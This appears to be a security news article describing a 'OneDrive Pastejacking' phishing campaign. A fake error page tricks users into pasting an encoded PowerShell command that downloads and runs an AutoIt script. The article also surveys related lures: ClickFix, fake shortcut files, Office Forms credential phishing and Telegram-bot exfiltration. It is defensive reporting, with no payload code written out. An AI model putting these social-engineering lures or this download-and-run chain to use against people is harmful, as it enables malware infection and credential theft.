OneDrive Phishing Scam
Cybersecurity experts have warned about a new phishing campaign targeting Microsoft OneDrive users. This campaign aims to deploy a harmful PowerShell script by employing sophisticated social engineering techniques to trick users into running the script and compromising their systems. The researchers are monitoring this innovative phishing and downloader campaign, which they have dubbed OneDrive Pastejacking.
Table of Contents
The Attackers Imitate OneDrive to Trick Victims
The attack starts with an email containing an HTML file that, when opened, presents an image mimicking a OneDrive page and displays an error message stating: "Failed to connect to the 'OneDrive' cloud service. To resolve this issue, manually update the DNS cache."
The email provides two options: 'How to fix' and 'Details.' The 'Details' link directs users to a genuine Microsoft Learn page on DNS troubleshooting.
However, clicking 'How to fix' leads users through a series of steps that involve pressing 'Windows Key + X' to access the Quick Link menu, opening the PowerShell terminal, and pasting a Base64-encoded command intended to fix the issue.
This command first executes ipconfig /flushdns, then creates a folder named 'downloads' on the C: drive. It proceeds by downloading an archive file into this folder, renaming it, extracting its contents (which include 'script.a3x' and 'AutoIt3.exe'), and running 'script.a3x' with 'AutoIt3.exe.'
Phishing Tactics Are Adopting New Tricks
The OneDrive Pastejacking phishing campaign has been detected targeting users across the U.S., South Korea, Germany, India, Ireland, Italy, Norway,and the U.K.
This discovery follows previous research on similar phishing tactics, known as ClickFix, which are becoming more common.
Additionally, a new email-based social engineering scheme has emerged, distributing fake Windows shortcut files that trigger malicious payloads hosted on Discord's Content Delivery Network (CDN).
The Attackers Are Exploit Legitimate Accounts
Phishing campaigns are increasingly using emails with links to Microsoft Office Forms from compromised legitimate accounts to trick targets into revealing their Microsoft 365 login credentials. The pretext often involves restoring Outlook messages.
Attackers design convincing forms on Microsoft Office Forms, embedding unsafe links within them. These forms are sent in bulk via email, masquerading as legitimate requests, such as password changes or accessing important documents, often imitating trusted platforms like Adobe or Microsoft SharePoint.
Additionally, other phishing attempts have employed invoice-themed bait to lure victims into entering their credentials on phishing pages hosted on Cloudflare R2, with the collected information being sent to the attackers via a Telegram bot.
It's clear that adversaries are continuously exploring new methods to bypass Secure Email Gateways (SEGs) to enhance the success rate of their attacks.
